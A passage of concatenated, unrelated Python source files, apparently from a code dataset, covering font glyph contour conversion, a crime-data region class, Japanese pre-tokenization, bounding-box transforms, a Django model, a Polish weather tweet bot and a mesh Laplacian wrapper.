68:'e', 69:'f', 70:'g', 71:'h',
72:'i', 73:'j', 74:'k', 75:'l',
76:'m', 77:'n', 78:'o', 79:'p',
80:'q', 81:'r', 82:'s', 83:'t',
84:'u', 85:'v', 86:'w', 87:'x',
88:'y', 89:'z', 90:'braceleft', 91:'bar',
92:'braceright', 93:'asciitilde'
}
metricsDict = {0:[38,int(-3),145,797], 1:[28,542,246,797],
2:[22,0,496,783], 3:[41,int(-20),351,803],
4:[46,int(-8),565,790], 5:[33,-10,418,823],
6:[28,542,110,797], 7:[87,int(-210),273,959],
8:[14,int(-210),200,959], 9:[32,382,409,783],
10:[46,160,485,599], 11:[19,int(-149),132,107],
12:[27,343,278,416], 13:[28,-3,132,107],
14:[6,int(-120), 347, 869], 15:[41,-14,363,797],
16:[15,0,191,783], 17:[29,0,340,797],
18:[33,-14,352,797], 19:[22,0,368,783],
20:[30,int(-14),341,783], 21:[41,int(-14),352,797],
22:[22,0,305,783], 23:[28,int(-14),355,797],
24:[41,int(-14),352,797], 25:[51,47,155,441],
26:[42,int(-99),155,441], 27:[46,182,485,576],
28:[46,243,485,515], 29:[46,182,485,576],
30:[26,int(-3),331,803], 31:[31,int(-189),654,707],
32:[18,0,377,783], 33:[46,0,369,783],
34:[41,int(-14),352,797], 35:[46,0,364,783],
36:[46,0,305,783], 37:[46,0,316,783],
38:[41,int(-14),352,797], 39:[46,0,369,783],
40:[46,0,138,783], 41:[20,int(-14),331,783],
42:[46,0,374,783], 43:[46,0,285,783],
44:[46,0,489,783], 45:[46,0,359,783],
46:[41,int(-14),363,797], 47:[46,0,364,783],
48:[41,int(-89),398,797], 49:[46,0,366,783],
50:[25,int(-14),347,797], 51:[20,0,288,783],
52:[44,int(-14),366,783], 53:[18,0,377,783],
54:[22,0,555,783], 55:[13,0,395,783],
56:[13,0,399,783], 57:[28,0,332,783],
58:[87,int(-210),273,959], 59:[6,-120,347,869],
60:[14,int(-210),200,959], 61:[29,344,423,783],
62:[0,int(-125),428,int(-66)], 63:[75,659,260,817],
64:[27,int(-8),340,619], 65:[46,int(-8),359,815],
66:[41,int(-8),337,619], 67:[41,int(-8),354,815],
68:[41,int(-8),339,619], 69:[12,0,303,823],
70:[3,int(-171),386,619], 71:[46,0,359,815],
72:[38,0,142,806], 73:[int(-71),int(-183),158,806],
74:[46,0,362,815], 75:[46,0,135,815],
76:[46,0,567,619], 77:[46,0,359,619],
78:[41,int(-8),345,619], 79:[46,int(-171),359,619],
80:[41,int(-171),354,619], 81:[46,0,301,619],
82:[27,int(-8),337,619], 83:[12,int(-8),298,754],
84:[44,int(-8),353,611], 85:[19,0,360,611],
86:[22,0,520,611], 87:[13,0,404,611],
88:[44,int(-171),353,611], 89:[27,0,321,611],
90:[32,int(-210),273,959], 91:[87,-160,160,909],
92:[14,int(-210),255,959], 93:[46,291,485,466]
}
#When you get to clockwise ordering...
class Glyph:
#Path is the list of contour paths that define a glyph.
def __init__(self, path, id):
self.id = int(id)
self.path = path
self.nContours = len(path)
self.name = idDict[id]
self.metrics = metricsDict[id]
    #Compute the signed (shoelace-style) edge sum of a contour; its sign is used to determine clockwise/counter-clockwise ordering.
def pointSum(self, contour, index):
point = contour[index]
if index < len(contour)-1:
nextPoint = contour[index+1]
ret = (nextPoint[0]-point[0])*(nextPoint[1]+point[1])
return ret + self.pointSum(contour, index+1)
else:
nextPoint = contour[0]
ret = (nextPoint[0]-point[0])*(nextPoint[1]+point[1])
return ret
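    #Illustrative note: for the square contour [(0,0), (0,1), (1,1), (1,0)] traversed
    #in that (clockwise, y-up) order the sum is +2; reversing the contour flips the
    #sign, which is what align() below uses to re-order contours.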
#Bring path into correct ordering
#Path => Contours => points => (x,y)
def align(self):
#Obtain first point
try:
iPoint = self.path[0][0]
for conIndex in range(len(self.path)):
contour = self.path[conIndex]
total = self.pointSum(contour, 0) #Recursive sum function
if total < 0:
self.path[conIndex] = contour[::-1]
except:
            pass
#Bring path vertices into ratio of font metrics.
#Canvas metrics are 1100x600 pixels.
#Consider importing glyph sizes? Perhaps write another dimension dictionary?
def scale(self):
xmin = self.metrics[0]
ymin = self.metrics[1]
xMax = self.metrics[2]
yMax = self.metrics[3]
largest = 0
contour = []
for conIndex in range(len(self.path)):
contourXMax = 1
contourYMax = 1
contour = self.path[conIndex]
for pIndex in range(len(contour)):
if contour[pIndex][0] > contourXMax:
contourXMax = contour[pIndex][0]
if contour[pIndex][1] > contourYMax:
contourYMax = contour[pIndex][1]
for pIndex in range(len(contour)):
x = int((contour[pIndex][0]/contourXMax)*(xMax - xmin))
y = int((600 - contour[pIndex][1]))
y = int((y/contourYMax)*(yMax-ymin))
contour[pIndex] = (x,y)
#Writes a string for the contour data of a glyph file.
def writeFormat(self):
ret = ""
for contour in self.path:
ret += "\t\t<contour>\n"
for point in contour:
ret += ("\t\t\t<pt x=\"" + str(point[0]) +"\" y=\"" + str(point[1]) + "\" on=\"1\"/>\n")
ret += "\t\t</contour>\n"
ret += "\t\t<instructions>\n"
ret += "\t\t\t<assembly>\n\t\t\t</assembly>\n"
ret += "\t\t</instructions>\n"
return ret
| 6,922 | 3,335 |
# Copyright 2014 Peter Griess
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
'''
Base class for region implementations.
'''
import crimedb.geocoding
import io
import json
import os
import os.path
import pkg_resources
import shapely.geometry
class Region(object):
'''
Base class for all regions.
    Provides support for common operations and a common API for use in other code.
'''
def __init__(self, name, work_dir=None, shape=None, geocoder=None):
self.name = name
self.work_dir = work_dir
if shape is None:
pkg = 'crimedb.regions.__data__'
rsrc = '{}.geojson'.format(name)
with pkg_resources.resource_stream(pkg, rsrc) as f:
tf = io.TextIOWrapper(f, encoding='utf-8', errors='replace')
shape = shapely.geometry.shape(json.load(tf))
self.shape = shape
if geocoder is None:
geocoder = crimedb.geocoding.geocode_null
self.geocoder = geocoder
self.human_name = None
self.human_url = None
def download(self):
'''
Download any new crime incidents.
This requires network access and may take along time to execute
depending on the specifics of the region implementation (some regions
have faster/slower access methods).
'''
pass
def process(self):
'''
Process any already-downloaded incidents.
This will iterate over all downloaded incidents and attempt to ensure
that they've been correctly converted into a CrimeDB incident. This may
involve geocoding, filtering out of invalid incidents, and other work.
        This process should be interruptible / restartable. In particular, some
        geocoders are flaky, so we should be able to re-run the process()
        method multiple times to complete geocoding of incidents that didn't
        complete previously.
'''
pass
def crimes(self):
'''
Iterator that yields crimedb.core.Crime objects.
'''
pass
def _cache_dir(self):
'''
Return the directory to be used for caching raw files. Creates it if
necessary.
'''
cache_dir = os.path.join(self.work_dir, 'raw')
os.makedirs(cache_dir, exist_ok=True)
return cache_dir
def _intermediate_dir(self):
'''
Return the directory to be used for storing intermediate files. Creates
it if necessary.
'''
int_dir = os.path.join(self.work_dir, 'intermediate')
os.makedirs(int_dir, exist_ok=True)
return int_dir
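# Hypothetical subclass sketch (illustrative only, not a real CrimeDB region): it
# shows the intended lifecycle of the base class above. The region name and the
# explicit `shape` are assumptions chosen to avoid loading a packaged geojson file.
class ExampleRegion(Region):
    def __init__(self, work_dir=None):
        super().__init__('example', work_dir=work_dir,
                         shape=shapely.geometry.box(0.0, 0.0, 1.0, 1.0))
    def crimes(self):
        # A real implementation would read processed incidents from
        # self._intermediate_dir() and yield crimedb.core.Crime objects.
        return iter(())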
| 3,170 | 882 |
from abc import ABC, abstractmethod
from typing import List
import MeCab
class PreTokenizer(ABC):
"""AutoTokenizer(bert-base-multilingual-cased)によって分かち書きをする前に、
前処理としてかける分かち書きのための抽象クラス
これを行わないと場合によっては、
「〇〇は3月2日に開催した」 -> 「〇 〇 は3 月 2 日 に 開 催 した」のように、「は3」のような
単語になってしまい、その後の分類タスクで悪影響が起きてしまう
"""
@abstractmethod
def parse(self, text: str) -> List[str]:
raise NotImplementedError
class MeCabPreTokenizer(PreTokenizer):
"""AutoTokenizerによって、分かち書きをする前にMeCabを使用して分かち書きをする場合に使用するクラス"""
def __init__(self):
self.tagger = MeCab.Tagger("-Owakati")
def parse(self, text: str) -> List[str]:
return self.tagger.parse(text).split()
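# Hypothetical usage sketch (illustrative only): assumes the `transformers` package
# and a MeCab dictionary are installed; the model name and example sentence are
# placeholders.
if __name__ == "__main__":
    from transformers import AutoTokenizer
    pre_tokenizer = MeCabPreTokenizer()
    words = pre_tokenizer.parse("〇〇は3月2日に開催した")  # MeCab word boundaries
    tokenizer = AutoTokenizer.from_pretrained("bert-base-multilingual-cased")
    # Joining on spaces lets the subword tokenizer respect the MeCab boundaries.
    print(tokenizer.tokenize(" ".join(words)))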
| 689 | 371 |
from typing import List, Dict, Sequence, Union, Tuple
from numbers import Number
import random
import numpy as np
from toolz import curry
from toolz.curried import get
from common import _tuple
__all__ = [
"resize", "resized_crop", "center_crop", "drop_boundary_bboxes",
"to_absolute_coords", "to_percent_coords", "hflip", "hflip2",
"vflip", "vflip2", "random_sample_crop", "move"
]
def iou_1m(box, boxes):
r"""
Calculates one-to-many ious.
Parameters
----------
box : ``Sequences[Number]``
A bounding box.
boxes : ``array_like``
Many bounding boxes.
Returns
-------
ious : ``array_like``
IoUs between the box and boxes.
"""
xi1 = np.maximum(boxes[..., 0], box[0])
yi1 = np.maximum(boxes[..., 1], box[1])
xi2 = np.minimum(boxes[..., 2], box[2])
yi2 = np.minimum(boxes[..., 3], box[3])
xdiff = xi2 - xi1
ydiff = yi2 - yi1
inter_area = xdiff * ydiff
box_area = (box[2] - box[0]) * (box[3] - box[1])
boxes_area = (boxes[..., 2] - boxes[..., 0]) * \
(boxes[..., 3] - boxes[..., 1])
union_area = boxes_area + box_area - inter_area
iou = inter_area / union_area
iou[xdiff < 0] = 0
iou[ydiff < 0] = 0
return iou
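# Illustrative example (not from the original module), boxes given as [l, t, r, b]:
#   iou_1m(np.array([0, 0, 10, 10]), np.array([[0, 0, 10, 10], [5, 5, 15, 15]]))
#   -> [1.0, 0.14285714...]  (25 / (100 + 100 - 25) for the second box)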
def random_sample_crop(anns, size, min_iou, min_ar, max_ar, max_attemps=50):
"""
    Randomly sample a crop window over the annotations (SSD-style).
    Windows of random size (0.3 to 1.0 of the original size) and constrained aspect
    ratio are sampled until one has at least `min_iou` IoU with every box and
    contains at least one box center; the surviving annotations and the window
    (left, top, width, height) are returned, or None after `max_attemps` tries.
Parameters
----------
anns : ``List[Dict]``
Sequences of annotation of objects, containing `bbox` of [l, t, w, h].
size : ``Sequence[int]``
Size of the original image.
min_iou : ``float``
Minimal iou between the objects and the cropped image.
min_ar : ``Number``
Minimal aspect ratio.
max_ar : ``Number``
Maximum aspect ratio.
max_attemps: ``int``
Maximum attemps to try.
"""
width, height = size
bboxes = np.stack([ann['bbox'] for ann in anns])
bboxes[:, 2:] += bboxes[:, :2]
for _ in range(max_attemps):
w = random.uniform(0.3 * width, width)
h = random.uniform(0.3 * height, height)
if h / w < min_ar or h / w > max_ar:
continue
l = random.uniform(0, width - w)
t = random.uniform(0, height - h)
r = l + w
b = t + h
patch = np.array([l, t, r, b])
ious = iou_1m(patch, bboxes)
if ious.min() < min_iou:
continue
centers = (bboxes[:, :2] + bboxes[:, 2:]) / 2.0
mask = (l < centers[:, 0]) & (centers[:, 0] < r) & (
t < centers[:, 1]) & (centers[:, 1] < b)
if not mask.any():
continue
indices = np.nonzero(mask)[0].tolist()
return get(indices, anns), l, t, w, h
return None
@curry
def resized_crop(anns, left, upper, width, height, output_size, min_area_frac):
anns = crop(anns, left, upper, width, height, min_area_frac)
size = (width, height)
# if drop:
# anns = drop_boundary_bboxes(anns, size)
anns = resize(anns, size, output_size)
return anns
@curry
def drop_boundary_bboxes(anns, size):
r"""
Drop bounding boxes whose centers are out of the image boundary.
Parameters
----------
anns : ``List[Dict]``
Sequences of annotation of objects, containing `bbox` of [l, t, w, h].
size : ``Sequence[int]``
Size of the original image.
"""
width, height = size
new_anns = []
for ann in anns:
l, t, w, h = ann['bbox']
        x = l + w / 2.
        y = t + h / 2.
if 0 <= x <= width and 0 <= y <= height:
new_anns.append({**ann, "bbox": [l, t, w, h]})
return new_anns
@curry
def center_crop(anns, size, output_size):
r"""
Crops the bounding boxes of the given PIL Image at the center.
Parameters
----------
anns : ``List[Dict]``
Sequences of annotation of objects, containing `bbox` of [l, t, w, h].
size : ``Sequence[int]``
Size of the original image.
output_size : ``Union[Number, Sequence[int]]``
Desired output size of the crop. If size is an int instead of sequence like (w, h),
a square crop (size, size) is made.
"""
output_size = _tuple(output_size, 2)
output_size = tuple(int(x) for x in output_size)
w, h = size
th, tw = output_size
upper = int(round((h - th) / 2.))
left = int(round((w - tw) / 2.))
    return crop(anns, left, upper, tw, th)
@curry
def crop(anns, left, upper, width, height, minimal_area_fraction=0.25):
r"""
Crop the bounding boxes of the given PIL Image.
Parameters
----------
anns : ``List[Dict]``
Sequences of annotation of objects, containing `bbox` of [l, t, w, h].
left: ``int``
Left pixel coordinate.
upper: ``int``
Upper pixel coordinate.
width: ``int``
Width of the cropped image.
height: ``int``
Height of the cropped image.
minimal_area_fraction : ``int``
Minimal area fraction requirement.
"""
new_anns = []
for ann in anns:
l, t, w, h = ann['bbox']
area = w * h
l -= left
t -= upper
if l + w >= 0 and l <= width and t + h >= 0 and t <= height:
if l < 0:
w += l
l = 0
if t < 0:
h += t
t = 0
w = min(width - l, w)
h = min(height - t, h)
if w * h < area * minimal_area_fraction:
continue
new_anns.append({**ann, "bbox": [l, t, w, h]})
return new_anns
@curry
def resize(anns, size, output_size):
"""
Parameters
----------
anns : List[Dict]
Sequences of annotation of objects, containing `bbox` of [l, t, w, h].
size : Sequence[int]
Size of the original image.
output_size : Union[Number, Sequence[int]]
Desired output size. If size is a sequence like (w, h), the output size will be matched to this.
        If size is an int, the smaller edge of the image will be matched to this number, maintaining
        the aspect ratio, i.e., if width > height, then the image will be rescaled to
(output_size * width / height, output_size)
"""
w, h = size
if isinstance(output_size, int):
if (w <= h and w == output_size) or (h <= w and h == output_size):
return anns
if w < h:
ow = output_size
sw = sh = ow / w
else:
oh = output_size
sw = sh = oh / h
else:
ow, oh = output_size
sw = ow / w
sh = oh / h
new_anns = []
for ann in anns:
bbox = list(ann['bbox'])
bbox[0] *= sw
bbox[1] *= sh
bbox[2] *= sw
bbox[3] *= sh
new_anns.append({**ann, "bbox": bbox})
return new_anns
@curry
def to_percent_coords(anns, size):
r"""
    Convert absolute coordinates of the bounding boxes to percent coordinates.
Parameters
----------
anns : ``List[Dict]``
Sequences of annotation of objects, containing `bbox` of [l, t, w, h].
size : ``Sequence[int]``
Size of the original image.
"""
w, h = size
new_anns = []
for ann in anns:
bbox = list(ann['bbox'])
bbox[0] /= w
bbox[1] /= h
bbox[2] /= w
bbox[3] /= h
new_anns.append({**ann, "bbox": bbox})
return new_anns
@curry
def to_absolute_coords(anns, size):
r"""
    Convert percent coordinates of the bounding boxes to absolute coordinates.
Parameters
----------
anns : ``List[Dict]``
Sequences of annotation of objects, containing `bbox` of [l, t, w, h].
size : ``Sequence[int]``
Size of the original image.
"""
w, h = size
new_anns = []
for ann in anns:
bbox = list(ann['bbox'])
bbox[0] *= w
bbox[1] *= h
bbox[2] *= w
bbox[3] *= h
new_anns.append({**ann, "bbox": bbox})
return new_anns
@curry
def hflip(anns, size):
"""
Horizontally flip the bounding boxes of the given PIL Image.
Parameters
----------
anns : ``List[Dict]``
Sequences of annotation of objects, containing `bbox` of [l, t, w, h].
size : ``Sequence[int]``
Size of the original image.
"""
w, h = size
new_anns = []
for ann in anns:
bbox = list(ann['bbox'])
bbox[0] = w - (bbox[0] + bbox[2])
new_anns.append({**ann, "bbox": bbox})
return new_anns
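# Illustrative example (not from the original module): for an image of width 100,
# a box [l, t, w, h] = [10, 20, 30, 40] flips to [60, 20, 30, 40], because the new
# left edge is image_width - (l + box_width) = 100 - 40 = 60.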
@curry
def hflip2(anns, size):
"""
Horizontally flip the bounding boxes of the given PIL Image.
Parameters
----------
anns : ``List[Dict]``
Sequences of annotation of objects, containing `bbox` of [l, t, r, b].
size : ``Sequence[int]``
Size of the original image.
"""
w, h = size
new_anns = []
for ann in anns:
bbox = list(ann['bbox'])
l = bbox[0]
bbox[0] = w - bbox[2]
bbox[2] = w - l
new_anns.append({**ann, "bbox": bbox})
return new_anns
@curry
def vflip(anns, size):
"""
Vertically flip the bounding boxes of the given PIL Image.
Parameters
----------
anns : ``List[Dict]``
Sequences of annotation of objects, containing `bbox` of [l, t, w, h].
size : ``Sequence[int]``
Size of the original image.
"""
w, h = size
new_anns = []
for ann in anns:
bbox = list(ann['bbox'])
bbox[1] = h - (bbox[1] + bbox[3])
new_anns.append({**ann, "bbox": bbox})
return new_anns
@curry
def vflip2(anns, size):
r"""
Vertically flip the bounding boxes of the given PIL Image.
Parameters
----------
anns : ``List[Dict]``
        Sequences of annotation of objects, containing `bbox` of [l, t, r, b].
size : ``Sequence[int]``
Size of the original image.
"""
w, h = size
new_anns = []
for ann in anns:
bbox = list(ann['bbox'])
t = bbox[1]
bbox[1] = h - bbox[3]
bbox[3] = h - t
new_anns.append({**ann, "bbox": bbox})
return new_anns
@curry
def move(anns, x, y):
r"""
Move the bounding boxes by x and y.
Parameters
----------
anns : ``List[Dict]``
Sequences of annotation of objects, containing `bbox` of [l, t, w, h].
x : ``Number``
How many to move along the horizontal axis.
y : ``Number``
How many to move along the vertical axis.
"""
new_anns = []
for ann in anns:
bbox = list(ann['bbox'])
bbox[0] += x
bbox[1] += y
new_anns.append({**ann, "bbox": bbox})
return new_anns
| 10,920 | 3,902 |
from django.db import models
from profiles.models import Profile, ProfileHub
from hubs.models import Hub, HubGeolocation
from django.db.models.signals import post_save
from demands.extras.coordinates import coordinates_calculation
from demands.extras.distance import distance_calculation
# Create your models here.
class Demand(models.Model):
title = models.CharField(max_length=100, blank=False)
description = models.TextField(blank=False)
number = models.CharField(max_length=10, blank=True)
street = models.CharField(max_length=200, blank=False)
postal_code = models.CharField(max_length=10, blank=False)
city = models.CharField(max_length=50, blank=False)
    requester = models.ForeignKey(Profile, on_delete=models.CASCADE, related_name='profile_demands')
is_CAPS = models.BooleanField(default=True)
is_BARTER = models.BooleanField(default=True)
is_GIVE = models.BooleanField(default=True)
created = models.DateTimeField(auto_now_add=True)
updated = models.DateTimeField(auto_now=True)
price_CAPS = models.PositiveIntegerField(null=True)
price_barter = models.CharField(max_length = 200, null=True)
def Demand_created_or_updated(sender,update_fields, **kwargs):
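    # On first save: geocode the demand's address, create its Demand_Hub row,
    # attach the requester's hub, and store the distance from the demand to that hub.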
instance = kwargs['instance']
if kwargs['created']:
lat_cal, lng_cal = coordinates_calculation(instance.number, instance.street, instance.postal_code, instance.city)
Demand_Hub.objects.create(demand = instance, lat=lat_cal, lng= lng_cal)
demand_geo = Demand_Hub.objects.get(demand = instance)
hubSelected = ProfileHub.objects.get(profile=instance.requester).hub
hub_geo = HubGeolocation.objects.get(hub=hubSelected)
distanceCalculation = distance_calculation(demand_geo,hub_geo)
demand_geo.hub=hubSelected
demand_geo.distance_km=distanceCalculation
demand_geo.save()
post_save.connect(Demand_created_or_updated, sender=Demand)
class Demand_Hub(models.Model):
demand = models.OneToOneField(Demand, on_delete=models.CASCADE)
hub = models.ForeignKey(Hub, on_delete=models.CASCADE, null= True, related_name='demands')
distance_km = models.DecimalField(max_digits=10, decimal_places=3, blank=False, null=True)
lat = models.DecimalField(max_digits=9, decimal_places=6, blank=True, null=True)
    # lng = longitude of the demand's address
    lng = models.DecimalField(max_digits=9, decimal_places=6, blank=True, null=True)
 | 2,429 | 788 |
# -*- coding: utf-8 -*-
import random
import time
import tweetpony
import urllib2
import json
from config import config
def fetch(url):
req = urllib2.Request(url)
response = urllib2.urlopen(req)
return response.read()
def get_json():
return json.loads(fetch("http://weather.spychalski.info/api.php"))
def main():
api = tweetpony.API(consumer_key=config['consumer_key'], consumer_secret=config['consumer_secret'],
access_token=config['access_token'], access_token_secret=config['access_token_secret'])
# noinspection PyStatementEffect
api.user
weather_data = get_json()
temperature = int(round(float(weather_data['Temperature'])))
humidity = int(round(float(weather_data['Humidity'])))
pressure = int(round(float(weather_data['Pressure'])))
try:
# print weather_data
message_type = 1
current_hour = int(time.strftime("%H"))
if current_hour >= 6 and current_hour <= 10:
message_type = 2
elif current_hour >= 19 and current_hour <= 23:
message_type = 3
text = ''
if message_type == 1:
text = u'Witaj Szczecinie, mamy ' + unicode(str(temperature)) + u'C i ' + unicode(
str(humidity)) + u'% wilgotności. Ciśnienie wynosi ' + unicode(str(pressure)) + 'hPa #szczecin #pogoda'
elif message_type == 2:
text = u'Prognoza na dziś: ' + unicode(
str(int(round(float(weather_data['Forecast'][0]['TempDay']))))) + u'C, ciśnienie ' + \
unicode(str(pressure)) + u'hPa, wiatr ' + unicode(
str(int(round(float(weather_data['Forecast'][0]['WindSpeed']))))) + u'm/s, '
rain = float(weather_data['Forecast'][0]['Rain'])
snow = float(weather_data['Forecast'][0]['Snow'])
if rain > 0 and snow == 0:
text += u'będzie padać'
elif rain == 0 and snow > 0:
text += u'będzie padać śnieg'
elif rain > 0 and snow > 0:
text += u'będzie padać śnieg z deszczem'
else:
text += u'brak opadów'
text += ' #pogoda #szczecin'
elif message_type == 3:
text = u'Prognoza na jutro: ' + unicode(
str(int(round(float(weather_data['Forecast'][1]['TempDay']))))) + u'C, ciśnienie ' + \
unicode(str(pressure)) + u'hPa, wiatr ' + unicode(
str(int(round(float(weather_data['Forecast'][1]['WindSpeed']))))) + u'm/s, '
rain = float(weather_data['Forecast'][1]['Rain'])
snow = float(weather_data['Forecast'][1]['Snow'])
if rain > 0 and snow == 0:
text += u'będzie padać'
elif rain == 0 and snow > 0:
text += u'będzie padać śnieg'
elif rain > 0 and snow > 0:
text += u'będzie padać śnieg z deszczem'
else:
text += u'brak opadów'
text += ' #pogoda #szczecin'
# print text
api.update_status(status=text)
except tweetpony.APIError as err:
print "Oops, something went wrong! Twitter returned error #%i and said: %s" % (err.code, err.description)
else:
print "Yay! Your tweet has been sent!"
if __name__ == "__main__":
main()
| 3,353 | 1,139 |
from output.models.nist_data.atomic.long.schema_instance.nistschema_sv_iv_atomic_long_max_exclusive_1_xsd.nistschema_sv_iv_atomic_long_max_exclusive_1 import NistschemaSvIvAtomicLongMaxExclusive1
__all__ = [
"NistschemaSvIvAtomicLongMaxExclusive1",
]
| 256 | 105 |
import numpy as np
import robust_laplacian_bindings as rlb
def mesh_laplacian(verts, faces, mollify_factor=1e-5):
## Validate input
if type(verts) is not np.ndarray:
raise ValueError("`verts` should be a numpy array")
if (len(verts.shape) != 2) or (verts.shape[1] != 3):
raise ValueError("`verts` should have shape (V,3), shape is " + str(verts.shape))
if type(faces) is not np.ndarray:
raise ValueError("`faces` should be a numpy array")
if (len(faces.shape) != 2) or (faces.shape[1] != 3):
raise ValueError("`faces` should have shape (F,3), shape is " + str(faces.shape))
## Call the main algorithm from the bindings
L, M = rlb.buildMeshLaplacian(verts, faces, mollify_factor)
## Return the result
return L, M
def point_cloud_laplacian(points, mollify_factor=1e-5, n_neighbors=30):
## Validate input
if type(points) is not np.ndarray:
raise ValueError("`points` should be a numpy array")
if (len(points.shape) != 2) or (points.shape[1] != 3):
raise ValueError("`points` should have shape (V,3), shape is " + str(points.shape))
## Call the main algorithm from the bindings
L, M = rlb.buildPointCloudLaplacian(points, mollify_factor, n_neighbors)
## Return the result
return L, M
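# Hypothetical usage sketch (illustrative only): assumes the compiled
# `robust_laplacian_bindings` are importable; the point cloud is random data.
if __name__ == "__main__":
    pts = np.random.rand(100, 3)
    L, M = point_cloud_laplacian(pts)
    # L is the Laplacian operator and M the matching mass matrix for the 100 points.
    print(type(L), type(M))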
| 1,310 | 458 |